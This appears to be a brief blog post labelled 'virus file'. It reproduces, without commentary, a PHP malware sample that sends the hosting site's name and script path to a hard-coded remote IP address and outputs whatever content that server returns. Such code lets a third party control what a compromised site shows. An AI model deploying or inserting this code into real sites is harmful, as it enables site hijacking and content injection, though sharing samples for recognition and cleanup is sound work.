病毒文件

<?php
set_time_limit(0);

header("Content-Type: text/html;charset=gb2312");
$Rermote_server = "http://107.151.66.90:777/"; 
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$Content_mb=getHTTPPage($Rermote_server."/index.php?host=".$host_name);

function getHTTPPage($url) {
    $opts = array(
      'http'=>array(
        'method'=>"GET",
        'header'=>"User-Agent: aQ0O010O"
      )
    );
    $context = stream_context_create($opts);
    $html = @file_get_contents($url, false, $context);
    if (empty($html)) {
        exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");
    }    
    return $html;
} 

echo $Content_mb;
?>

 

posted @ 2017-04-28 16:47  Abner3721  阅读(411)  评论(0编辑  收藏  举报